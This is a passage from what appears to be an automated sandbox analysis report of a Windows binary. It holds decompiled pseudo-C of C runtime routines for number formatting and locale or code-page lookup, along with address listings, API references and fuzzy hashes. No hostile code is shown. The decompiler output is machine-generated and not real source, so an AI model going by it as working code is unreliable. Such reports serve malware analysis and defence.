                    											_t1207 = _v1872;
                    											__eflags = _t1154;
                    											if(_t1154 != 0) {
                    												_t797 = _v472;
                    												__eflags = _t797 - 0x73;
                    												if(_t797 >= 0x73) {
                    													__eflags = 0;
                    													_push(0);
                    													_v2408 = 0;
                    													_v472 = 0;
                    													_push( &_v2404);
                    													_push(_t1022);
                    													_push( &_v468);
                    													L313();
                    													_t1238 =  &(_t1238[4]);
                    												} else {
                    													 *(_t1232 + _t797 * 4 - 0x1d0) = _t1154;
                    													_v472 = _v472 + 1;
                    												}
                    											}
                    											_t796 = E01401420( &_v472,  &_v936);
                    											_t1155 = 8;
                    											_t1028 = _v1916 - _t1207;
                    											__eflags = _t1028;
                    											do {
                    												_t708 = _t796 % _v1912;
                    												_t796 = _t796 / _v1912;
                    												_t1106 = _t708 + 0x30;
                    												__eflags = _t1028 - _t1155;
                    												if(_t1028 >= _t1155) {
                    													 *((char*)(_t1155 + _t1207)) = _t1106;
                    												}
                    												_t1155 = _t1155 - 1;
                    												__eflags = _t1155 - 0xffffffff;
                    											} while (_t1155 != 0xffffffff);
                    											__eflags = _t1028 - 9;
                    											if(_t1028 > 9) {
                    												_t1028 = 9;
                    											}
                    											_t1205 = _t1207 + _t1028;
                    											_v1872 = _t1205;
                    											__eflags = _t1205 - _v1916;
                    											if(__eflags != 0) {
                    												continue;
                    											}
                    											goto L303;
                    										}
                    									}
                    									L303:
                    									 *_t1205 = 0;
                    									goto L309;
                    								}
                    							}
                    						}
                    					}
                    				} else {
                    					_t1028 = _t1193 & 0x000fffff;
                    					if((_t1143 | _t1193 & 0x000fffff) != 0) {
                    						goto L5;
                    					} else {
                    						_push("0");
                    						 *((intOrPtr*)(_v1924 + 4)) =  *(_v1924 + 4) & 0x00000000;
                    						L308:
                    						_push(_a24);
                    						_push(_t1013);
                    						if(E01405C86() != 0) {
                    							_push(0);
                    							_push(0);
                    							_push(0);
                    							_push(0);
                    							_push(0);
                    							E013FDA8E();
                    							asm("int3");
                    							_push(_t1232);
                    							_push(_t1193);
                    							_t1194 = _v2424;
                    							__eflags = _t1194;
                    							if(_t1194 != 0) {
                    								_t740 = _v0;
                    								__eflags = _t740;
                    								if(_t740 != 0) {
                    									_push(_t1143);
                    									_t1144 = _a8;
                    									__eflags = _t1144;
                    									if(_t1144 == 0) {
                    										L320:
                    										E013F5890(_t1144, _t740, 0, _a4);
                    										__eflags = _t1144;
                    										if(_t1144 != 0) {
                    											__eflags = _a4 - _t1194;
                    											if(_a4 >= _t1194) {
                    												_t742 = 0x16;
                    											} else {
                    												_t743 = E013FDB3A();
                    												_push(0x22);
                    												goto L324;
                    											}
                    										} else {
                    											_t743 = E013FDB3A();
                    											_push(0x16);
                    											L324:
                    											_pop(_t1196);
                    											 *_t743 = _t1196;
                    											E013FDA61();
                    											_t742 = _t1196;
                    										}
                    									} else {
                    										__eflags = _a4 - _t1194;
                    										if(_a4 < _t1194) {
                    											goto L320;
                    										} else {
                    											E013F5310(_t740, _t1144, _t1194);
                    											_t742 = 0;
                    										}
                    									}
                    								} else {
                    									_t746 = E013FDB3A();
                    									_t1197 = 0x16;
                    									 *_t746 = _t1197;
                    									E013FDA61();
                    									_t742 = _t1197;
                    								}
                    							} else {
                    								_t742 = 0;
                    							}
                    							return _t742;
                    						} else {
                    							L309:
                    							_t1245 = _v1936;
                    							if(_v1936 != 0) {
                    								_t737 = E0141456F(_t1028, _t1245,  &_v1944);
                    							}
                    							return E013F268B(_t737, _v8 ^ _t1232);
                    						}
                    					}
                    				}
                    			}
                    0x014134b6
                    0x014134bc
                    0x014134bc
                    0x014134c8
                    0x014134d3
                    0x014134d6
                    0x014134e3
                    0x014134e6
                    0x014134e7
                    0x014134e8
                    0x014134ee
                    0x014134f0
                    0x014134f6
                    0x014134fc
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x014134fe
                    0x014134fe
                    0x014134fe
                    0x01413500
                    0x00000000
                    0x00000000
                    0x01413502
                    0x01413505
                    0x00000000
                    0x0141350b
                    0x0141350b
                    0x0141350d
                    0x0141350f
                    0x0141350f
                    0x0141350f
                    0x01413517
                    0x0141351a
                    0x0141351a
                    0x01413520
                    0x01413522
                    0x01413524
                    0x0141352b
                    0x01413531
                    0x01413533
                    0x00000000
                    0x01413533
                    0x00000000
                    0x01413505
                    0x00000000
                    0x014134fe
                    0x00000000
                    0x014134a2
                    0x01413465
                    0x01413465
                    0x01413467
                    0x0141346d
                    0x01413474
                    0x01413474
                    0x01413477
                    0x01413477
                    0x00000000
                    0x01413467
                    0x00000000
                    0x0141354b
                    0x0141354b
                    0x0141354c
                    0x0141354c
                    0x00000000
                    0x01413451
                    0x0141336c
                    0x0141336c
                    0x01413377
                    0x0141337e
                    0x01413384
                    0x0141338b
                    0x0141338c
                    0x0141338d
                    0x01413392
                    0x01413395
                    0x01413397
                    0x00000000
                    0x0141339d
                    0x0141339d
                    0x014133a0
                    0x00000000
                    0x014133a6
                    0x014133a6
                    0x014133ad
                    0x00000000
                    0x014133b3
                    0x014133b9
                    0x014133bb
                    0x014133c1
                    0x014133c1
                    0x014133c3
                    0x014133c3
                    0x014133c5
                    0x014133ce
                    0x014133d5
                    0x014133d8
                    0x014133d9
                    0x014133db
                    0x014133db
                    0x00000000
                    0x014133e3
                    0x014133ad
                    0x014133a0
                    0x01413397
                    0x014132d0
                    0x014132d0
                    0x014132d6
                    0x014132d8
                    0x014132f4
                    0x014132f7
                    0x00000000
                    0x014132fd
                    0x014132fd
                    0x01413304
                    0x00000000
                    0x0141330a
                    0x01413310
                    0x01413312
                    0x01413318
                    0x01413318
                    0x0141331a
                    0x0141331a
                    0x0141331c
                    0x01413325
                    0x0141332c
                    0x0141332f
                    0x01413330
                    0x01413332
                    0x01413332
                    0x0141333a
                    0x0141333a
                    0x0141333c
                    0x00000000
                    0x01413342
                    0x01413342
                    0x01413348
                    0x0141334b
                    0x01413615
                    0x01413617
                    0x01413618
                    0x0141361e
                    0x0141362a
                    0x01413631
                    0x01413632
                    0x01413633
                    0x01413638
                    0x0141363b
                    0x01413351
                    0x01413351
                    0x01413358
                    0x00000000
                    0x01413358
                    0x0141334b
                    0x0141333c
                    0x01413304
                    0x014132da
                    0x014132da
                    0x014132dc
                    0x014132e2
                    0x014132e8
                    0x014132e9
                    0x01413566
                    0x01413566
                    0x0141356d
                    0x0141356e
                    0x0141356f
                    0x01413574
                    0x01413577
                    0x01413577
                    0x01413577
                    0x014132d8
                    0x01413579
                    0x01413579
                    0x0141357b
                    0x01413642
                    0x01413649
                    0x01413650
                    0x01413663
                    0x01413669
                    0x0141366a
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x01413581
                    0x01413587
                    0x01413587
                    0x0141358d
                    0x0141358d
                    0x01413599
                    0x00000000
                    0x01413599
                    0x01412dd6
                    0x01412dd6
                    0x01412dd8
                    0x01412dde
                    0x01412de0
                    0x01412de6
                    0x01412de8
                    0x0141315f
                    0x0141315f
                    0x01413161
                    0x01413167
                    0x0141316e
                    0x01413170
                    0x014131cf
                    0x014131d2
                    0x014131d8
                    0x014131de
                    0x014131e4
                    0x014131e6
                    0x014131ec
                    0x014131ee
                    0x014131ee
                    0x014131f0
                    0x014131f0
                    0x014131f2
                    0x014131fb
                    0x01413202
                    0x01413205
                    0x01413206
                    0x01413208
                    0x01413208
                    0x01413210
                    0x01413212
                    0x01413218
                    0x0141321e
                    0x01413221
                    0x00000000
                    0x01413227
                    0x01413227
                    0x0141322e
                    0x0141322e
                    0x01413221
                    0x01413212
                    0x014131e6
                    0x01413172
                    0x01413172
                    0x01413174
                    0x0141317a
                    0x01413180
                    0x00000000
                    0x01413180
                    0x01413170
                    0x01412dee
                    0x01412dee
                    0x01412dee
                    0x01412df1
                    0x01412df5
                    0x01412df5
                    0x01412df6
                    0x01412e08
                    0x01412e15
                    0x01412e24
                    0x01412e4e
                    0x01412e53
                    0x01412e59
                    0x01412e5c
                    0x01412e62
                    0x01412e65
                    0x01412ee1
                    0x01412ee8
                    0x01412fac
                    0x01412fb2
                    0x01412fb8
                    0x01412fbb
                    0x01412fbd
                    0x01413046
                    0x01412fc3
                    0x01412fc3
                    0x01412fc9
                    0x01412fc9
                    0x01412fcf
                    0x01412fd5
                    0x01412fd7
                    0x01412fd9
                    0x01412fd9
                    0x01412fdf
                    0x01412fe5
                    0x01412fe7
                    0x01412fef
                    0x01412fef
                    0x01412ff5
                    0x01412ff7
                    0x01412ff9
                    0x01412fff
                    0x01413001
                    0x01413118
                    0x0141311a
                    0x01413120
                    0x01413120
                    0x00000000
                    0x01413007
                    0x0141300d
                    0x0141300d
                    0x0141300f
                    0x01413015
                    0x01413018
                    0x0141301f
                    0x01413025
                    0x01413027
                    0x0141304e
                    0x01413050
                    0x01413052
                    0x01413054
                    0x0141305a
                    0x01413060
                    0x014130fa
                    0x014130fa
                    0x014130fd
                    0x00000000
                    0x01413103
                    0x01413103
                    0x01413109
                    0x00000000
                    0x01413109
                    0x01413066
                    0x01413066
                    0x01413066
                    0x01413069
                    0x00000000
                    0x00000000
                    0x0141306b
                    0x0141306d
                    0x0141306f
                    0x01413078
                    0x01413078
                    0x0141307a
                    0x01413080
                    0x01413080
                    0x0141308c
                    0x01413097
                    0x0141309a
                    0x014130a7
                    0x014130aa
                    0x014130ab
                    0x014130ac
                    0x014130b2
                    0x014130b4
                    0x014130ba
                    0x014130c0
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x014130c2
                    0x014130c2
                    0x014130c2
                    0x014130c4
                    0x00000000
                    0x00000000
                    0x014130c6
                    0x014130c9
                    0x01413183
                    0x01413183
                    0x01413185
                    0x0141318b
                    0x01413191
                    0x01413192
                    0x00000000
                    0x014130cf
                    0x014130cf
                    0x014130d1
                    0x014130d3
                    0x014130d3
                    0x014130d3
                    0x014130db
                    0x014130de
                    0x014130de
                    0x014130e4
                    0x014130e6
                    0x014130e8
                    0x014130ef
                    0x014130f5
                    0x014130f7
                    0x00000000
                    0x014130f7
                    0x00000000
                    0x014130c9
                    0x00000000
                    0x014130c2
                    0x00000000
                    0x01413066
                    0x01413029
                    0x01413029
                    0x0141302b
                    0x01413031
                    0x01413038
                    0x01413038
                    0x0141303b
                    0x0141303b
                    0x00000000
                    0x0141302b
                    0x00000000
                    0x0141310f
                    0x0141310f
                    0x01413110
                    0x01413110
                    0x00000000
                    0x01413015
                    0x01412eee
                    0x01412eee
                    0x01412ef9
                    0x01412f00
                    0x01412f06
                    0x01412f0d
                    0x01412f0e
                    0x01412f0f
                    0x01412f14
                    0x01412f17
                    0x01412f19
                    0x01412f35
                    0x01412f38
                    0x00000000
                    0x01412f3e
                    0x01412f3e
                    0x01412f45
                    0x00000000
                    0x01412f4b
                    0x01412f51
                    0x01412f53
                    0x01412f59
                    0x01412f59
                    0x01412f5b
                    0x01412f5b
                    0x01412f5d
                    0x01412f66
                    0x01412f6d
                    0x01412f70
                    0x01412f71
                    0x01412f73
                    0x01412f73
                    0x00000000
                    0x01412f5b
                    0x01412f45
                    0x01412f1b
                    0x01412f1d
                    0x01412f23
                    0x01412f29
                    0x01412f2a
                    0x00000000
                    0x01412f2a
                    0x01412f19
                    0x01412e67
                    0x01412e67
                    0x01412e6d
                    0x01412e6f
                    0x01412e84
                    0x01412e87
                    0x00000000
                    0x01412e8d
                    0x01412e8d
                    0x01412e94
                    0x00000000
                    0x01412e9a
                    0x01412ea0
                    0x01412ea2
                    0x01412ea8
                    0x01412ea8
                    0x01412eaa
                    0x01412eaa
                    0x01412eac
                    0x01412eb5
                    0x01412ebc
                    0x01412ebf
                    0x01412ec0
                    0x01412ec2
                    0x01412ec2
                    0x01412f7b
                    0x01412f7b
                    0x01412f7d
                    0x00000000
                    0x01412f83
                    0x01412f83
                    0x01412f89
                    0x01412f8c
                    0x01412ecf
                    0x01412ed6
                    0x00000000
                    0x01412f92
                    0x01412f94
                    0x01412f9a
                    0x01412fa0
                    0x01412fa1
                    0x01413198
                    0x01413198
                    0x0141319f
                    0x014131a0
                    0x014131a1
                    0x014131a6
                    0x014131a9
                    0x014131a9
                    0x01412f8c
                    0x01412f7d
                    0x01412e94
                    0x01412e71
                    0x01412e71
                    0x01412e73
                    0x01412e79
                    0x01413123
                    0x01413123
                    0x01413124
                    0x0141312a
                    0x0141312a
                    0x01413131
                    0x01413132
                    0x01413133
                    0x01413138
                    0x0141313b
                    0x0141313b
                    0x0141313b
                    0x01412e6f
                    0x0141313d
                    0x0141313d
                    0x0141313f
                    0x014131ad
                    0x014131b4
                    0x014131b4
                    0x014131b4
                    0x014131bb
                    0x014131bd
                    0x014131c3
                    0x014131c4
                    0x01413670
                    0x01413670
                    0x01413671
                    0x01413672
                    0x01413677
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x01413141
                    0x01413147
                    0x01413147
                    0x0141314d
                    0x0141314d
                    0x01413159
                    0x00000000
                    0x01413159
                    0x01412de8
                    0x0141367a
                    0x0141367a
                    0x01413680
                    0x01413682
                    0x01413688
                    0x0141368e
                    0x01413690
                    0x01413692
                    0x01413694
                    0x01413694
                    0x01413696
                    0x01413696
                    0x0141369f
                    0x014136a0
                    0x014136a4
                    0x014136ab
                    0x014136ae
                    0x014136af
                    0x014136b1
                    0x014136b1
                    0x014136b5
                    0x014136bb
                    0x014136bd
                    0x014136c3
                    0x014136c5
                    0x014136cb
                    0x014136ce
                    0x014136e1
                    0x014136e3
                    0x014136e4
                    0x014136ea
                    0x014136f6
                    0x014136fd
                    0x014136fe
                    0x014136ff
                    0x01413704
                    0x014136d0
                    0x014136d2
                    0x014136d9
                    0x014136d9
                    0x014136ce
                    0x01413707
                    0x01413707
                    0x01413717
                    0x01413720
                    0x01413721
                    0x01413723
                    0x014137ba
                    0x014137bc
                    0x014137c7
                    0x014137c7
                    0x014137c9
                    0x014137cc
                    0x014137ce
                    0x00000000
                    0x014137be
                    0x014137c4
                    0x014137c4
                    0x01413729
                    0x01413729
                    0x0141372f
                    0x01413732
                    0x01413738
                    0x0141373b
                    0x01413741
                    0x01413743
                    0x01413749
                    0x0141374b
                    0x0141374d
                    0x0141374d
                    0x0141374f
                    0x0141374f
                    0x0141375c
                    0x01413763
                    0x01413766
                    0x01413767
                    0x01413769
                    0x0141376a
                    0x0141376a
                    0x0141376e
                    0x01413774
                    0x01413776
                    0x01413778
                    0x0141377e
                    0x01413781
                    0x01413794
                    0x01413795
                    0x0141379b
                    0x014137a7
                    0x014137ae
                    0x014137af
                    0x014137b0
                    0x014137b5
                    0x01413783
                    0x01413783
                    0x0141378a
                    0x0141378a
                    0x01413781
                    0x01413776
                    0x014137d4
                    0x014137d4
                    0x014137d4
                    0x014137e0
                    0x014137e3
                    0x014137e9
                    0x014137eb
                    0x014137ed
                    0x014137f3
                    0x014137f5
                    0x014137f5
                    0x014137f5
                    0x014137f3
                    0x014137fa
                    0x014137fb
                    0x014137fd
                    0x014137ff
                    0x014137ff
                    0x01413801
                    0x01413807
                    0x0141380d
                    0x0141380f
                    0x01413815
                    0x01413815
                    0x0141381b
                    0x0141381d
                    0x00000000
                    0x00000000
                    0x01413823
                    0x01413825
                    0x01413827
                    0x01413827
                    0x01413829
                    0x01413829
                    0x01413839
                    0x01413840
                    0x01413843
                    0x01413844
                    0x01413846
                    0x01413846
                    0x0141384a
                    0x01413850
                    0x01413852
                    0x01413854
                    0x0141385a
                    0x0141385d
                    0x0141386e
                    0x01413870
                    0x01413871
                    0x01413877
                    0x01413883
                    0x0141388a
                    0x0141388b
                    0x0141388c
                    0x01413891
                    0x0141385f
                    0x0141385f
                    0x01413866
                    0x01413866
                    0x0141385d
                    0x014138a2
                    0x014138b1
                    0x014138b2
                    0x014138b2
                    0x014138b4
                    0x014138b6
                    0x014138b6
                    0x014138bc
                    0x014138bf
                    0x014138c1
                    0x014138c3
                    0x014138c3
                    0x014138c6
                    0x014138c7
                    0x014138c7
                    0x014138cc
                    0x014138cf
                    0x014138d3
                    0x014138d3
                    0x014138d4
                    0x014138d6
                    0x014138dc
                    0x014138e2
                    0x00000000
                    0x00000000
                    0x00000000
                    0x014138e2
                    0x01413815
                    0x014138e8
                    0x014138e8
                    0x00000000
                    0x014138e8
                    0x0141266d
                    0x01412664
                    0x0141265b
                    0x01412612
                    0x01412616
                    0x0141261e
                    0x00000000
                    0x01412620
                    0x01412626
                    0x0141262b
                    0x01413907
                    0x01413907
                    0x0141390a
                    0x01413915
                    0x01413940
                    0x01413941
                    0x01413942
                    0x01413943
                    0x01413944
                    0x01413945
                    0x0141394a
                    0x0141394d
                    0x01413950
                    0x01413951
                    0x01413954
                    0x01413956
                    0x0141395c
                    0x0141395f
                    0x01413961
                    0x01413976
                    0x01413977
                    0x0141397a
                    0x0141397c
                    0x01413992
                    0x01413998
                    0x014139a0
                    0x014139a2
                    0x014139ad
                    0x014139b0
                    0x014139c7
                    0x014139b2
                    0x014139b2
                    0x014139b7
                    0x00000000
                    0x014139b7
                    0x014139a4
                    0x014139a4
                    0x014139a9
                    0x014139b9
                    0x014139b9
                    0x014139ba
                    0x014139bc
                    0x014139c1
                    0x014139c1
                    0x0141397e
                    0x0141397e
                    0x01413981
                    0x00000000
                    0x01413983
                    0x01413986
                    0x0141398e
                    0x0141398e
                    0x01413981
                    0x01413963
                    0x01413963
                    0x0141396a
                    0x0141396b
                    0x0141396d
                    0x01413972
                    0x01413972
                    0x01413958
                    0x01413958
                    0x01413958
                    0x014139cb
                    0x01413917
                    0x01413917
                    0x01413917
                    0x01413921
                    0x0141392a
                    0x0141392f
                    0x0141393d
                    0x0141393d
                    0x01413915
                    0x0141261e

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: __floor_pentium4
                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                    • API String ID: 4168288129-2761157908
                    • Opcode ID: cdb79c9a11c37909341a3f50ca16a791dd24aa78a3e52f2e05a9d446b0a8ab51
                    • Instruction ID: 94e21faff75bc91981c62d22f59bb1e6e4cf045aba2a4755c810f5d9343e7b3e
                    • Opcode Fuzzy Hash: cdb79c9a11c37909341a3f50ca16a791dd24aa78a3e52f2e05a9d446b0a8ab51
                    • Instruction Fuzzy Hash: 90C23771E086298BDB25CE28DD40BEAB7B5FB48314F1441EBD94DE7258E774AE818F40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 94%
                    			E0140FC17(void* __ecx, signed int _a4, intOrPtr _a8) {
                    				short _v8;
                    				short _t17;
                    				signed int _t18;
                    				signed int _t23;
                    				signed int _t25;
                    				signed int _t26;
                    				signed int _t27;
                    				void* _t30;
                    				void* _t31;
                    				intOrPtr _t32;
                    				intOrPtr _t33;
                    				intOrPtr* _t36;
                    				intOrPtr* _t37;
                    
                    				_push(__ecx);
                    				_t23 = _a4;
                    				if(_t23 == 0) {
                    					L21:
                    					_t12 = _a8 + 8; // 0xfde8fe81
                    					if(GetLocaleInfoW( *_t12, 0x20001004,  &_v8, 2) != 0) {
                    						_t17 = _v8;
                    						if(_t17 == 0) {
                    							_t17 = GetACP();
                    						}
                    						L25:
                    						return _t17;
                    					}
                    					L22:
                    					_t17 = 0;
                    					goto L25;
                    				}
                    				_t18 = 0;
                    				if( *_t23 == 0) {
                    					goto L21;
                    				}
                    				_t36 = 0x14297a0;
                    				_t25 = _t23;
                    				while(1) {
                    					_t30 =  *_t25;
                    					if(_t30 !=  *_t36) {
                    						break;
                    					}
                    					if(_t30 == 0) {
                    						L7:
                    						_t26 = _t18;
                    						L9:
                    						if(_t26 == 0) {
                    							goto L21;
                    						}
                    						_t37 = 0x14297a8;
                    						_t27 = _t23;
                    						while(1) {
                    							_t31 =  *_t27;
                    							if(_t31 !=  *_t37) {
                    								break;
                    							}
                    							if(_t31 == 0) {
                    								L17:
                    								if(_t18 != 0) {
                    									_t17 = E0140663B(_t23, _t23);
                    									goto L25;
                    								}
                    								_t8 = _a8 + 8; // 0xfde8fe81
                    								if(GetLocaleInfoW( *_t8, 0x2000000b,  &_v8, 2) == 0) {
                    									goto L22;
                    								}
                    								_t17 = _v8;
                    								goto L25;
                    							}
                    							_t32 =  *((intOrPtr*)(_t27 + 2));
                    							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
                    								break;
                    							}
                    							_t27 = _t27 + 4;
                    							_t37 = _t37 + 4;
                    							if(_t32 != 0) {
                    								continue;
                    							}
                    							goto L17;
                    						}
                    						asm("sbb eax, eax");
                    						_t18 = _t18 | 0x00000001;
                    						goto L17;
                    					}
                    					_t33 =  *((intOrPtr*)(_t25 + 2));
                    					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
                    						break;
                    					}
                    					_t25 = _t25 + 4;
                    					_t36 = _t36 + 4;
                    					if(_t33 != 0) {
                    						continue;
                    					}
                    					goto L7;
                    				}
                    				asm("sbb edx, edx");
                    				_t26 = _t25 | 0x00000001;
                    				goto L9;
                    			}

















                    APIs
                    • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0140FF36,?,00000000), ref: 0140FCB0
                    • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0140FF36,?,00000000), ref: 0140FCD9
                    • GetACP.KERNEL32(?,?,0140FF36,?,00000000), ref: 0140FCEE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: InfoLocale
                    • String ID: ACP$OCP
                    • API String ID: 2299586839-711371036
                    • Opcode ID: 1b75ce617caec489922823eb88eee0c105f97e9c0f1729a5a628fed564bbbf8d
                    • Instruction ID: 98c7b201a67d230357b783c8511301f7bcf753768a078a9b4c5b7c115135d206
                    • Opcode Fuzzy Hash: 1b75ce617caec489922823eb88eee0c105f97e9c0f1729a5a628fed564bbbf8d
                    • Instruction Fuzzy Hash: F321D83260C101ABD737CF2AC906A9777A6BF44A54B568436ED0AD73A1E732DD49C350
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 91%
                    			E0140FDEB(void* __ecx, void* __edx, signed int _a4, short* _a8, short* _a12) {
                    				signed int _v8;
                    				int _v12;
                    				int _v16;
                    				char _v20;
                    				signed int* _v24;
                    				short* _v28;
                    				void* __ebx;
                    				void* __edi;
                    				void* __ebp;
                    				signed int _t39;
                    				void* _t45;
                    				signed int* _t46;
                    				signed int _t47;
                    				short* _t48;
                    				int _t49;
                    				void* _t53;
                    				short* _t56;
                    				short* _t57;
                    				short* _t58;
                    				int _t65;
                    				int _t67;
                    				short* _t71;
                    				intOrPtr _t74;
                    				void* _t76;
                    				short* _t77;
                    				intOrPtr _t84;
                    				short* _t87;
                    				short* _t90;
                    				void* _t92;
                    				short** _t99;
                    				short* _t100;
                    				signed int _t101;
                    				signed short _t104;
                    				signed int _t105;
                    				void* _t106;
                    
                    				_t39 =  *0x1435234; // 0x78d9f939
                    				_v8 = _t39 ^ _t105;
                    				_t87 = _a12;
                    				_t101 = _a4;
                    				_v28 = _a8;
                    				_v24 = E01406A01(_t87, __ecx, __edx) + 0x50;
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosd");
                    				_t45 = E01406A01(_t87, __ecx, __edx);
                    				_t97 = 0;
                    				 *((intOrPtr*)(_t45 + 0x34c)) =  &_v20;
                    				_t90 = _t101 + 0x80;
                    				_t46 = _v24;
                    				 *_t46 = _t101;
                    				_t99 =  &(_t46[1]);
                    				 *_t99 = _t90;
                    				if(_t90 != 0 &&  *_t90 != 0) {
                    					_t84 =  *0x142979c; // 0x17
                    					E0140FD8E(0, 0x1429688, _t84 - 1, _t99);
                    					_t46 = _v24;
                    					_t106 = _t106 + 0xc;
                    					_t97 = 0;
                    				}
                    				_v20 = _t97;
                    				_t47 =  *_t46;
                    				if(_t47 == 0 ||  *_t47 == _t97) {
                    					_t48 =  *_t99;
                    					__eflags = _t48;
                    					if(_t48 == 0) {
                    						L19:
                    						_v20 = 0x104;
                    						_t49 = GetUserDefaultLCID();
                    						_v12 = _t49;
                    						_v16 = _t49;
                    						goto L20;
                    					}
                    					__eflags =  *_t48 - _t97;
                    					if( *_t48 == _t97) {
                    						goto L19;
                    					}
                    					E0140F72B(_t90, _t97,  &_v20);
                    					_pop(_t90);
                    					goto L20;
                    				} else {
                    					_t71 =  *_t99;
                    					if(_t71 == 0 ||  *_t71 == _t97) {
                    						E0140F811(_t90, _t97,  &_v20);
                    					} else {
                    						E0140F776(_t90, _t97,  &_v20);
                    					}
                    					_pop(_t90);
                    					if(_v20 != 0) {
                    						_t100 = 0;
                    						__eflags = 0;
                    						goto L25;
                    					} else {
                    						_t74 =  *0x1429684; // 0x41
                    						_t76 = E0140FD8E(_t97, 0x1429378, _t74 - 1, _v24);
                    						_t106 = _t106 + 0xc;
                    						if(_t76 == 0) {
                    							L20:
                    							_t100 = 0;
                    							__eflags = 0;
                    							L21:
                    							if(_v20 != 0) {
                    								L25:
                    								asm("sbb esi, esi");
                    								_t104 = E0140FC17(_t90,  ~_t101 & _t101 + 0x00000100,  &_v20);
                    								_pop(_t92);
                    								__eflags = _t104;
                    								if(_t104 == 0) {
                    									goto L22;
                    								}
                    								__eflags = _t104 - 0xfde8;
                    								if(_t104 == 0xfde8) {
                    									goto L22;
                    								}
                    								__eflags = _t104 - 0xfde9;
                    								if(_t104 == 0xfde9) {
                    									goto L22;
                    								}
                    								_t56 = IsValidCodePage(_t104 & 0x0000ffff);
                    								__eflags = _t56;
                    								if(_t56 == 0) {
                    									goto L22;
                    								}
                    								_t57 = IsValidLocale(_v16, 1);
                    								__eflags = _t57;
                    								if(_t57 == 0) {
                    									goto L22;
                    								}
                    								_t58 = _v28;
                    								__eflags = _t58;
                    								if(__eflags != 0) {
                    									 *_t58 = _t104;
                    								}
                    								E014071BA(_t87, _t92, _t100, __eflags, _v16,  &(_v24[0x94]), 0x55, _t100);
                    								__eflags = _t87;
                    								if(__eflags == 0) {
                    									L36:
                    									_t53 = 1;
                    									L23:
                    									return E013F268B(_t53, _v8 ^ _t105);
                    								}
                    								_t33 =  &(_t87[0x90]); // 0x14051f7
                    								E014071BA(_t87, _t92, _t100, __eflags, _v16, _t33, 0x55, _t100);
                    								_t65 = GetLocaleInfoW(_v16, 0x1001, _t87, 0x40);
                    								__eflags = _t65;
                    								if(_t65 == 0) {
                    									goto L22;
                    								}
                    								_t36 =  &(_t87[0x40]); // 0x1405157
                    								_t67 = GetLocaleInfoW(_v12, 0x1002, _t36, 0x40);
                    								__eflags = _t67;
                    								if(_t67 == 0) {
                    									goto L22;
                    								}
                    								_t38 =  &(_t87[0x80]); // 0x14051d7
                    								E014142F3(_t38, _t104, _t38, 0x10, 0xa);
                    								goto L36;
                    							}
                    							L22:
                    							_t53 = 0;
                    							goto L23;
                    						}
                    						_t77 =  *_t99;
                    						_t100 = 0;
                    						if(_t77 == 0 ||  *_t77 == 0) {
                    							E0140F811(_t90, _t97,  &_v20);
                    						} else {
                    							E0140F776(_t90, _t97,  &_v20);
                    						}
                    						_pop(_t90);
                    						goto L21;
                    					}
                    				}
                    			}







































                    APIs
                      • Part of subcall function 01406A01: GetLastError.KERNEL32(00000000,?,013FEF5F,?,00000000,?,013FECA1,00000000,00000000,00000000,00000000,0141BE7F,00000000,00000000,00000000,?), ref: 01406A05
                      • Part of subcall function 01406A01: _free.LIBCMT ref: 01406A38
                      • Part of subcall function 01406A01: SetLastError.KERNEL32(00000000,013FECA1,00000000,00000000,00000000,00000000,0141BE7F,00000000,00000000,00000000,?), ref: 01406A79
                      • Part of subcall function 01406A01: _abort.LIBCMT ref: 01406A7F
                      • Part of subcall function 01406A01: _free.LIBCMT ref: 01406A60
                      • Part of subcall function 01406A01: SetLastError.KERNEL32(00000000,013FECA1,00000000,00000000,00000000,00000000,0141BE7F,00000000,00000000,00000000,?), ref: 01406A6D
                    • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0140FEF7
                    • IsValidCodePage.KERNEL32(00000000), ref: 0140FF52
                    • IsValidLocale.KERNEL32(?,00000001), ref: 0140FF61
                    • GetLocaleInfoW.KERNEL32(?,00001001,014050D7,00000040,?,014051F7,00000055,00000000,?,?,00000055,00000000), ref: 0140FFA9
                    • GetLocaleInfoW.KERNEL32(?,00001002,01405157,00000040), ref: 0140FFC8
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
